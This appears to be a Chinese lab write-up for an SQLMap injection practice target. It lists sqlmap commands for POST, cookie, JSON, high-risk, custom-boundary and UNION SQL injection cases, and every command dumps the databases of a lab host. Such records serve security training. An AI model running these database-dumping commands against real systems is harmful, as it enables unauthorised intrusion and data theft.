完整教程:SQLMap注入学习靶机(打靶记录)
POST Parameter Injection (Case #2)
sqlmap 'http://10.22.230.252/case2.php' \
--data 'id=1' \
--batch \
--dump-all
Cookie-based Injection (Case #3)
sqlmap 'http://10.22.230.252/case3.php' --cookie='id=1*' --batch --dump-all
JSON API Injection (Case #4))
sqlmap 'http://10.22.230.252/case4.php' \
--data='{"id":1*}' \
--headers='Content-Type: application/json' \
--batch \
--dump-all
High Risk SQLi (Case #5)
sqlmap -u http://10.22.146.174/case5.php?order=1 --batch --dump --level=4 --risk=3
Non-Standard Boundary SQLi (Case #6)
sqlmap -u "http://10.22.146.174/case6.php?col=id" --batch --dump --level=4 --risk=3
--prefix="%'))" --suffix="-- -"
UNION SQLi (Case #7)
sqlmap -u "http://10.22.253.82/case7.php?id=1" --union-cols=5 --batch --dump
浙公网安备 33010602011771号